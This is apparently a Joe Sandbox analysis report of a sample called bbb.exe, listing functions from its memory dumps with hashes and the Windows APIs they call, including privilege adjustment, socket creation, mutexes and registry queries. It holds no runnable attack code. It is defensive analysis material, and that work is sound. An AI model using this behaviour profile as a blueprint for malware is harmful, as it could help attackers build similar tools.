Snapshot File: hcaresult_4_2_aa0000_bbb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44752e7606996d7577473a2d3bc90a38761fd434f35cc3024ed2087dba10a562
Instruction ID: 5b6fbcdcf2f0c4a4e96a361853f3fbf3583603fd145d5a3c47a3cf88383e95a8
Opcode Fuzzy Hash: 44752e7606996d7577473a2d3bc90a38761fd434f35cc3024ed2087dba10a562
Instruction Fuzzy Hash: 32E092B66006044B9750CF0AFD41462F7D8EB88630B08C07FDC0D8B701D239B908CAA5

Function 05902B17 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3132690123.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5900000_bbb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a4ca4e3a97ee3d3fc34389166ca6a42874e6fc5d4732fa9487b5262abb76c32
Instruction ID: 2656539c19242b4c8285f6abd4956c8c404dab53d7f883ac4f8557fcc0da7fec
Opcode Fuzzy Hash: 5a4ca4e3a97ee3d3fc34389166ca6a42874e6fc5d4732fa9487b5262abb76c32
Instruction Fuzzy Hash: DAE0D8B664020067D3108F0A9C45F62FB98DB94A30F04C45BED081B742E175B9148AF5

Function 0590357F Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3132690123.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5900000_bbb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a97321f1ba3951560552b69038ef081bd5ff59db97134f53dc2771fdb9149cea
Instruction ID: cf376d6e53b2cfa35e99e4dfb717e81075a39ccfe3f8c5f65bc0eafbff6c7a4d
Opcode Fuzzy Hash: a97321f1ba3951560552b69038ef081bd5ff59db97134f53dc2771fdb9149cea
Instruction Fuzzy Hash: 25E0D8F654020067D7508E0A9C45F62FB98DB94930F04C46BED081B742D175B914CAF5

Function 00CB23F4 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3074333292.0000000000CB2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_cb2000_bbb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 950ff7b9b93e0cc97df9b3a5c615b60fb04750a192e16726c9955b7f48b8a979
Instruction ID: 60751f3057f92b3714ea353bd88d1c08233eb1ca7a44a55d4ba22b086f7bbefd
Opcode Fuzzy Hash: 950ff7b9b93e0cc97df9b3a5c615b60fb04750a192e16726c9955b7f48b8a979
Instruction Fuzzy Hash: 36D02E392406C04FD3128B0CC2A8BC63BD4AF40704F0A00F9A800CBB63C728DAC4EA00

Function 00CB23BC Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3074333292.0000000000CB2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_cb2000_bbb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d96b5fe2340cf25b8830da93a66b97de64dbae389941c71c0aaa417e4b4c383
Instruction ID: 1c920f188b13bf7d717a269032537d5d827ae2bf70ebbf40727b217da68fb796
Opcode Fuzzy Hash: 0d96b5fe2340cf25b8830da93a66b97de64dbae389941c71c0aaa417e4b4c383
Instruction Fuzzy Hash: FBD05E342006814BC715DA0CC2E4F9937D8AB44714F0A44E8AC208B772C7A8D9C4DA00

Analysis Process: bbb.exePID: 1516, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	10.4%
Dynamic/Decrypted Code Coverage:	76.2%
Signature Coverage:	0%
Total number of Nodes:	122
Total number of Limit Nodes:	3

Executed Functions

Function 056D0F78 Relevance: 6.4, Strings: 4, Instructions: 1429
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

]XZk^, xrefs: 056D15F1, 056D15F6
MXZk^, xrefs: 056D15A0, 056D15A5
mXZk^, xrefs: 056D168D, 056D1692
}XZk^, xrefs: 056D16F5, 056D16FA

Memory Dump Source

Source File: 00000005.00000002.2132586564.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_56d0000_bbb.jbxd

Similarity

API ID:
String ID: MXZk^$]XZk^$mXZk^$}XZk^
API String ID: 0-256532575
Opcode ID: aa6767989a44aac241f69f84e3dc11f64d39e39d9171284bd07df4f82fc3056e
Instruction ID: 4e1d12ff23299173de33b58c8bde9096eb3b2cf7026f07304d18b790229ea8f8
Opcode Fuzzy Hash: aa6767989a44aac241f69f84e3dc11f64d39e39d9171284bd07df4f82fc3056e
Instruction Fuzzy Hash: 41425C30B042108BDB18AB78D9587BDB6E3AFC6209F044469D506DB7D1DFB9DD0AC7A2

Function 056D0F69 Relevance: 5.7, Strings: 4, Instructions: 713
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

]XZk^, xrefs: 056D15F1, 056D15F6
MXZk^, xrefs: 056D15A0, 056D15A5
mXZk^, xrefs: 056D168D, 056D1692
}XZk^, xrefs: 056D16F5, 056D16FA

Memory Dump Source

Source File: 00000005.00000002.2132586564.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_56d0000_bbb.jbxd

Similarity

API ID:
String ID: MXZk^$]XZk^$mXZk^$}XZk^
API String ID: 0-256532575
Opcode ID: 3b9cc562da3d18442620cf407c515463d545de84887c822d1debc8bc7b59478c
Instruction ID: 5a158c0d11c79d6f7b2940ab70ae3a4cbcf6cb56df8232d0f8cab777e417e81f
Opcode Fuzzy Hash: 3b9cc562da3d18442620cf407c515463d545de84887c822d1debc8bc7b59478c
Instruction Fuzzy Hash: A4426B30B002108BDB28AB38D9587BDB2E3AFD6209F144469D5069B7D5DFB9DD0AC7E1

Function 0622253F Relevance: 1.6, APIs: 1, Instructions: 75COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 062225BF

Memory Dump Source

Source File: 00000005.00000002.2133000336.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6220000_bbb.jbxd

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 226ad70899017c4b637b1e720544b2aab961a16debae82155333d713a54c7845
Instruction ID: 99bd7a3eaec0660c5ff118a95791e2f8d483d8a205d6f202ab1714fbe7b3654a
Opcode Fuzzy Hash: 226ad70899017c4b637b1e720544b2aab961a16debae82155333d713a54c7845
Instruction Fuzzy Hash: 3521FE76509381AFDB228F24CC54B52BFF4EF06310F0884DAED848B163D235EA18DB62

Function 06222576 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 062225BF

Memory Dump Source

Source File: 00000005.00000002.2133000336.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6220000_bbb.jbxd

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 30c7a16223c6c8b342fac475e7760acf9d5062c8c35743e8ff887b059026a618
Instruction ID: 1d32bb751a119ab8fefc89898f197e5fa013aa2b3ae4a70693fd484cdc34d2d4
Opcode Fuzzy Hash: 30c7a16223c6c8b342fac475e7760acf9d5062c8c35743e8ff887b059026a618
Instruction Fuzzy Hash: 8A11C675510201DFDB60CF15D884B66FBE4EF04320F08C46AED458B665D376E518DFA1

Function 06220AB8 Relevance: 1.6, APIs: 1, Instructions: 105
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MapViewOfFile.KERNELBASE ref: 06220B6A

Memory Dump Source

Source File: 00000005.00000002.2133000336.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6220000_bbb.jbxd

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: cd467c98179832b96abd449eb7b8d82abb27d311f0a94841e78df23d47d960e4
Instruction ID: 417914304eaec3e85e7685b360c173f9e5a12817374c77bf60ff4483c2096213
Opcode Fuzzy Hash: cd467c98179832b96abd449eb7b8d82abb27d311f0a94841e78df23d47d960e4
Instruction Fuzzy Hash: BA311872408384AFE722CF61DC45F96BFB8EF06324F0844DAE9858B553D325D90AC762

Function 0143BD62 Relevance: 1.6, APIs: 1, Instructions: 103
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0143BE21

Memory Dump Source

Source File: 00000005.00000002.2131907724.000000000143A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0143A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_143a000_bbb.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 0bc22de3048c2f649aaf16b7f07f10356f4e5b98a311ee5419afab3b83bfcc36
Instruction ID: 898bc653e48747bcf2b185535d257c08a79d290e8e2890cd26dfe43e44d941ad
Opcode Fuzzy Hash: 0bc22de3048c2f649aaf16b7f07f10356f4e5b98a311ee5419afab3b83bfcc36
Instruction Fuzzy Hash: 0D31E571504380AFE712CF65CC45BA2BFE8EF46314F08849AE9848B663D335E409C771

Function 06222047 Relevance: 1.6, APIs: 1, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getaddrinfo.WS2_32(?,00000E24), ref: 0622211F

Memory Dump Source

Source File: 00000005.00000002.2133000336.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6220000_bbb.jbxd

Similarity

API ID: getaddrinfo
String ID:
API String ID: 300660673-0
Opcode ID: 79ca12b1d909e973636ce221bd017d5254f671bcd6db5b2c27432753fc994072
Instruction ID: e59118d758aa7ca1fc65fe2e9dd12c04c954ad3dcb3aeb8ae1ca1ebf4a7e6849
Opcode Fuzzy Hash: 79ca12b1d909e973636ce221bd017d5254f671bcd6db5b2c27432753fc994072
Instruction Fuzzy Hash: 7731C1B1505344AFE7228B61CC84FA6BBBCEF05314F04449AFA849B692D379A94DCB71

Function 062203F8 Relevance: 1.6, APIs: 1, Instructions: 95
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSASocketW.WS2_32(?,?,?,?,?), ref: 062204AA

Memory Dump Source

Source File: 00000005.00000002.2133000336.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6220000_bbb.jbxd

Similarity

API ID: Socket
String ID:
API String ID: 38366605-0
Opcode ID: 4a172314c7929ca42cb5e512409925718301b1ff54a194d1dc210cc2dee6cea2
Instruction ID: 666cdfd8c8e51378408f9c38f1654cfa5b064d0d4c7469b8b255dc92fa958ead
Opcode Fuzzy Hash: 4a172314c7929ca42cb5e512409925718301b1ff54a194d1dc210cc2dee6cea2
Instruction Fuzzy Hash: 4731A4714093C0AFD7238B65CD45B56BFB4EF06310F0884DBE9858B5A3C269A919CB72

Function 06221134 Relevance: 1.6, APIs: 1, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,00000E24), ref: 062211D3

Memory Dump Source

Source File: 00000005.00000002.2133000336.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6220000_bbb.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 96669d51dbf8c8d118e75b97bbb81f564fc74cb5baee96e8c28da79b3cb46a0b
Instruction ID: b6c86365554e152836f1c48c5e8ca3a0307c45ee5277c6c70c8e978bb9941792
Opcode Fuzzy Hash: 96669d51dbf8c8d118e75b97bbb81f564fc74cb5baee96e8c28da79b3cb46a0b
Instruction Fuzzy Hash: 4C31C472504344AFEB228B61DC44FA7BBFCEF45220F04485AF985CB952D364A549CB71

Function 06221321 Relevance: 1.6, APIs: 1, Instructions: 92
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAIoctl.WS2_32(?,00000E24,9AE30442,00000000,00000000,00000000,00000000), ref: 062213D5

Memory Dump Source

Source File: 00000005.00000002.2133000336.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6220000_bbb.jbxd

Similarity

API ID: Ioctl
String ID:
API String ID: 3041054344-0
Opcode ID: f60e9aab0d9900969bc6ecb792c89538e3ab827da25fd887950ab7bda8eada3f
Instruction ID: ab77d93a8abad16fa1101be481954548b727e2fc0242047e5ea0330770fac31f
Opcode Fuzzy Hash: f60e9aab0d9900969bc6ecb792c89538e3ab827da25fd887950ab7bda8eada3f
Instruction Fuzzy Hash: 26318F75505780AFE7228F61CC44FA2BFF8EF06714F08849AE9848B562D335E919CB71

Function 0622102C Relevance: 1.6, APIs: 1, Instructions: 92
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessTimes.KERNELBASE(?,00000E24,9AE30442,00000000,00000000,00000000,00000000), ref: 062210C9

Memory Dump Source

Source File: 00000005.00000002.2133000336.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6220000_bbb.jbxd

Similarity

API ID: ProcessTimes
String ID:
API String ID: 1995159646-0
Opcode ID: 41f1354f5c6274e5fb5bc561462093de38099da3ef6e286d25a42734908561f9
Instruction ID: e32dd2a1da568d251bbd32d75d2b6dde83adf210926a9daf044011f7a610033c
Opcode Fuzzy Hash: 41f1354f5c6274e5fb5bc561462093de38099da3ef6e286d25a42734908561f9
Instruction Fuzzy Hash: 8031F4769093816FD7628F21CC44F96BFB8EF06320F08849AED848F193D224A959CB71

Function 06220820 Relevance: 1.6, APIs: 1, Instructions: 89
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000E24), ref: 062208B7

Memory Dump Source

Source File: 00000005.00000002.2133000336.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6220000_bbb.jbxd

Similarity

API ID: DescriptorSecurity$ConvertString
String ID:
API String ID: 3907675253-0
Opcode ID: ab200c7b66ca5f8c95d41e1c6b601ac96c1a45eeffa01bfd27a427d3b287dd01
Instruction ID: 6e48eee4d407c151e145e2c7d74e2e5689a377edafda58f9b3d3b4b05f86819f
Opcode Fuzzy Hash: ab200c7b66ca5f8c95d41e1c6b601ac96c1a45eeffa01bfd27a427d3b287dd01
Instruction Fuzzy Hash: 1D31C172504385AFE721CB25DC45FA7BBF8EF05720F08849AE984CB652D324E948CB72

Function 0143B6CD Relevance: 1.6, APIs: 1, Instructions: 89
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExW.KERNELBASE(?,00000E24,9AE30442,00000000,00000000,00000000,00000000), ref: 0143B788

Memory Dump Source

Source File: 00000005.00000002.2131907724.000000000143A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0143A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_143a000_bbb.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 0669a1417b5d060da187ce6f35b6d56dd67db94b1cc6cd0dd5d4567f3a503e02
Instruction ID: d98a53cca0ea05fb28b3575dee0f4ad1019733e321421ca3b3362626a23b57e8
Opcode Fuzzy Hash: 0669a1417b5d060da187ce6f35b6d56dd67db94b1cc6cd0dd5d4567f3a503e02
Instruction Fuzzy Hash: 0A31AF755093846FE722CB25CC44FA2BFA8EF46214F08849AE9448B663D364E948CB61

Function 06220722 Relevance: 1.6, APIs: 1, Instructions: 87
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExW.KERNELBASE(?,00000E24,9AE30442,00000000,00000000,00000000,00000000), ref: 062207CC

Memory Dump Source

Source File: 00000005.00000002.2133000336.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6220000_bbb.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 2d58f47290b5425c00da0ad8d99bd8455ce88475a8d8050f2bbcb6a4c4598ea1
Instruction ID: 9a7bfeaaebd7b5d70c678d3509f4d05e19311f184a3154e24c7c0ddf5c6fa132
Opcode Fuzzy Hash: 2d58f47290b5425c00da0ad8d99bd8455ce88475a8d8050f2bbcb6a4c4598ea1
Instruction Fuzzy Hash: E73193765093806FD722CB25CC44F92BFF8EF06314F0884DAE9858B563D264E949CB71

Function 06221231 Relevance: 1.6, APIs: 1, Instructions: 87
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ioctlsocket.WS2_32(?,00000E24,9AE30442,00000000,00000000,00000000,00000000), ref: 062212D7

Memory Dump Source

Source File: 00000005.00000002.2133000336.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6220000_bbb.jbxd

Similarity

API ID: ioctlsocket
String ID:
API String ID: 3577187118-0
Opcode ID: a117c03f5e8b9c77ecad1741c2c4edfbd2dbcc6965b506aef81fecbd75a3c6ed
Instruction ID: 25fed66592ff69ab3cda3e007b8f251b908808792f750e68b9b2a45d6892f2a7
Opcode Fuzzy Hash: a117c03f5e8b9c77ecad1741c2c4edfbd2dbcc6965b506aef81fecbd75a3c6ed
Instruction Fuzzy Hash: 9E31C0764097846FD712CB21CC45FA6BFB8EF46310F0984DAE9848F5A3C225A908CB71

Function 06220D6D Relevance: 1.6, APIs: 1, Instructions: 85
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNELBASE(?,?), ref: 06220E0D

Memory Dump Source

Source File: 00000005.00000002.2133000336.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6220000_bbb.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 129672bb1d436e8138fc93649b55c6e9be926e3253598b4be635358412f1649c
Instruction ID: a2782a84cb11697eb5e76070b0e8dddee92b59761bdd8cd05a91ab2a892945bc
Opcode Fuzzy Hash: 129672bb1d436e8138fc93649b55c6e9be926e3253598b4be635358412f1649c
Instruction Fuzzy Hash: 953180B1509380AFE711CF65CD45B96FFF8EF05210F08889AE9888B692D365E948CB61

Function 0622207A Relevance: 1.6, APIs: 1, Instructions: 84
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getaddrinfo.WS2_32(?,00000E24), ref: 0622211F

Memory Dump Source

Source File: 00000005.00000002.2133000336.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6220000_bbb.jbxd

Similarity

API ID: getaddrinfo
String ID:
API String ID: 300660673-0
Opcode ID: ab0223dae8248d09b024f0dcfcbd413b5a342d97c81c9fa08f9749373f2de638
Instruction ID: 82e5d52af39b23dc00afa4f8dce7a9d157ddca437b252c10f591eb38c6d32112
Opcode Fuzzy Hash: ab0223dae8248d09b024f0dcfcbd413b5a342d97c81c9fa08f9749373f2de638
Instruction Fuzzy Hash: FD21F371500205BEFB30DB51CD84FAAF7ACEF04314F04485AFA489A681D7B5E68D8BB1

Function 062218AE Relevance: 1.6, APIs: 1, Instructions: 83registryCOMMON

Download Yara Rule

APIs

RegNotifyChangeKeyValue.KERNELBASE(?,00000E24,9AE30442,00000000,00000000,00000000,00000000), ref: 06221958

Memory Dump Source

Source File: 00000005.00000002.2133000336.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6220000_bbb.jbxd

Similarity

API ID: ChangeNotifyValue
String ID:
API String ID: 3933585183-0
Opcode ID: 86dcb216f0d098ca2faeed8e5146b9381205904639971d201af2b04d8cb3bf74
Instruction ID: 3a3fc569108c81ea4477efd73d02960d970d4336eeae30509de0b53c828cf80c
Opcode Fuzzy Hash: 86dcb216f0d098ca2faeed8e5146b9381205904639971d201af2b04d8cb3bf74
Instruction Fuzzy Hash: 3431D5724053846FEB22CB51CC44FA6FFB8EF46314F08889AE9849B553D274A549C7B1

Function 062216B4 Relevance: 1.6, APIs: 1, Instructions: 83registryCOMMON

Download Yara Rule

APIs

RegOpenCurrentUser.KERNELBASE(?,00000E24), ref: 0622174D

Memory Dump Source

Source File: 00000005.00000002.2133000336.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6220000_bbb.jbxd

Similarity

API ID: CurrentOpenUser
String ID:
API String ID: 1571386571-0
Opcode ID: 6940f6d56520188e0c4480194a4ba52519a7c54c8b6870e67d3b0af8c1dcb79c
Instruction ID: f4703eb06e7bd6900db7a640ac89f116dded3cca61cb1c253eecca270f8acc1c
Opcode Fuzzy Hash: 6940f6d56520188e0c4480194a4ba52519a7c54c8b6870e67d3b0af8c1dcb79c
Instruction Fuzzy Hash: 6321F6754093846FE7228B21CD44FA6BFB8EF46314F0984DBE9448F553D264A90DC771

Function 062227AD Relevance: 1.6, APIs: 1, Instructions: 82COMMON

Download Yara Rule

APIs

K32GetModuleInformation.KERNEL32(?,00000E24,9AE30442,00000000,00000000,00000000,00000000), ref: 0622283E

Memory Dump Source

Source File: 00000005.00000002.2133000336.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6220000_bbb.jbxd

Similarity

API ID: InformationModule
String ID:
API String ID: 3425974696-0
Opcode ID: 99c5ae75a3738e62a942a8b6bc058622904dae94e8f07e81ad6332bb4cd30232
Instruction ID: 6a37e80a01a222cdaa9fdfba4bf21d91d060c0e294b6b05cdf44b322d6f929e8
Opcode Fuzzy Hash: 99c5ae75a3738e62a942a8b6bc058622904dae94e8f07e81ad6332bb4cd30232
Instruction Fuzzy Hash: B921D675505345AFE721CB11CC44FA6BFB8EF46310F08849AE944CB552D265E948CB72

Function 062228A4 Relevance: 1.6, APIs: 1, Instructions: 81COMMON

Download Yara Rule

APIs

K32GetModuleBaseNameW.KERNEL32(?,00000E24,?,?), ref: 0622294A

Memory Dump Source

Source File: 00000005.00000002.2133000336.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6220000_bbb.jbxd

Similarity

API ID: BaseModuleName
String ID:
API String ID: 595626670-0
Opcode ID: 211809df58ecfa591334e269f1286fe2d7686f1eae7a688d5d69858d39186aa1
Instruction ID: 6b36765f5ba10a67057f8eee4c259e3d360792a0d5d77e8abb72a4a17f180c9a
Opcode Fuzzy Hash: 211809df58ecfa591334e269f1286fe2d7686f1eae7a688d5d69858d39186aa1
Instruction Fuzzy Hash: 1921EF715093C06FD312CB21CC55B66BFB8EF87210F0984CBD884DB6A3C624A909C7B2

Function 062226C1 Relevance: 1.6, APIs: 1, Instructions: 81COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(?,00000E24,9AE30442,00000000,00000000,00000000,00000000), ref: 0622274E

Memory Dump Source

Source File: 00000005.00000002.2133000336.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6220000_bbb.jbxd

Similarity

API ID: EnumModulesProcess
String ID:
API String ID: 1082081703-0
Opcode ID: e0ff1938fa307e282870ba6a33cb8f54d628b6b2f44e6354af483dfaed8dfacf
Instruction ID: 250920cc432b6b51ae121f5a79b593c8b41b80ef1f0341e6d81d6a4b97ffbea0
Opcode Fuzzy Hash: e0ff1938fa307e282870ba6a33cb8f54d628b6b2f44e6354af483dfaed8dfacf
Instruction Fuzzy Hash: 3521E276509380AFE722CB21CC44B96BFB8EF46320F08849AE984DF553C265A948C771

Function 06221156 Relevance: 1.6, APIs: 1, Instructions: 80COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,00000E24), ref: 062211D3

Memory Dump Source

Source File: 00000005.00000002.2133000336.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6220000_bbb.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 2adb7597e6b9fb3cfa0fc0b4be421d05fe278069c21aff6db9eb4cfb352fad15
Instruction ID: 3ccb5d5e21ce516d570f39b407c8934cd1c6aaf810fc8409c7573c9d58c028dc
Opcode Fuzzy Hash: 2adb7597e6b9fb3cfa0fc0b4be421d05fe278069c21aff6db9eb4cfb352fad15
Instruction Fuzzy Hash: D621C472500205AFEB219F51DD44FABFBECEF08324F04885AEE45CBA51D375E5588BA1

Function 06220257 Relevance: 1.6, APIs: 1, Instructions: 80registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000E24,?,?), ref: 062202FA

Memory Dump Source

Source File: 00000005.00000002.2133000336.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6220000_bbb.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 374f797f854decccff6f3505d84256ae9a308175361d652368e8f4f0bc118b18
Instruction ID: 215b341348dba1b9721a8ec76b274edaf873b65f2e91b30c96fcb46a4b574da4
Opcode Fuzzy Hash: 374f797f854decccff6f3505d84256ae9a308175361d652368e8f4f0bc118b18
Instruction Fuzzy Hash: DC21D67550E3C06FD3138B25CC51B62BFB4EF87614F0A80CBE8849B693D225A959C7B2

Function 0143BE78 Relevance: 1.6, APIs: 1, Instructions: 80COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(?,00000E24,9AE30442,00000000,00000000,00000000,00000000), ref: 0143BF0D

Memory Dump Source

Source File: 00000005.00000002.2131907724.000000000143A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0143A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_143a000_bbb.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 3e3cb385ef359c5fa75323bb32313ddee76c21f335ef1b35b54f5751d05f8ecf
Instruction ID: 792d3b9a068ee5b9569b6715754793d311fb1377d6ae6b6c1f2acd513cbc50b7
Opcode Fuzzy Hash: 3e3cb385ef359c5fa75323bb32313ddee76c21f335ef1b35b54f5751d05f8ecf
Instruction Fuzzy Hash: A12128754093806FD7138B259C40BA6BFACEF47720F0880DAE9848B2A3D2649909CB71

Function 062209D6 Relevance: 1.6, APIs: 1, Instructions: 78COMMON

Download Yara Rule

APIs

OpenFileMappingW.KERNELBASE(?,?), ref: 06220A61

Memory Dump Source

Source File: 00000005.00000002.2133000336.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6220000_bbb.jbxd

Similarity

API ID: FileMappingOpen
String ID:
API String ID: 1680863896-0
Opcode ID: c79b3ad72e30b0f31feae4a921022c00b8ee2842a4434fa6c75f49913810b29c
Instruction ID: 003d489acf5bceee5e9f722e64a6b5867034e1dd931399bb6b2d741d0b495e4f
Opcode Fuzzy Hash: c79b3ad72e30b0f31feae4a921022c00b8ee2842a4434fa6c75f49913810b29c
Instruction Fuzzy Hash: 5C2191B15053806FE711CB65CD45F66FBE8EF05220F08849AED858B652D375E948C772

Function 06220846 Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000E24), ref: 062208B7

Memory Dump Source

Source File: 00000005.00000002.2133000336.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6220000_bbb.jbxd

Similarity

API ID: DescriptorSecurity$ConvertString
String ID:
API String ID: 3907675253-0
Opcode ID: 2cec4c8a6a32053fcfa5bb9ae2de7849cd392adce9e131c39f7e0aca09aa9eac
Instruction ID: 3fe122cc5e47d8033ea9c2fc21d022f688587968e8084672c36542af3b4993ec
Opcode Fuzzy Hash: 2cec4c8a6a32053fcfa5bb9ae2de7849cd392adce9e131c39f7e0aca09aa9eac
